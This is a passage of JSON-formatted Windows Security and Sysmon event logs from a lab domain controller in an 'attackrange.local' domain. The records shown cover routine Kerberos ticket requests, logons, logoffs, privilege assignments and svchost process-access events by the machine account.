YSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220385,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-881393$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{557CDD29-3D05-7C13-A843-635BED52B3AC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-881393$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{557CDD29-3D05-7C13-A843-635BED52B3AC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220386,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4ABC1\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4abc1","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220387,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4ABC1\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4abc1","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220388,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AC0A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4ac0a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220389,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4AC0A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t2001:0:34f1:8072:10bc:13e3:f5ff:fef1\r\n\tSource Port:\t\t49704\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4ac0a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"2001:0:34f1:8072:10bc:13e3:f5ff:fef1","IpPort":"49704","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220390,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AC0A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ac0a","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220391,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4ABC1\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4abc1","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2612,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2613,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2614,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220392,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AD02\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4ad02","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220393,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4AD02\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon 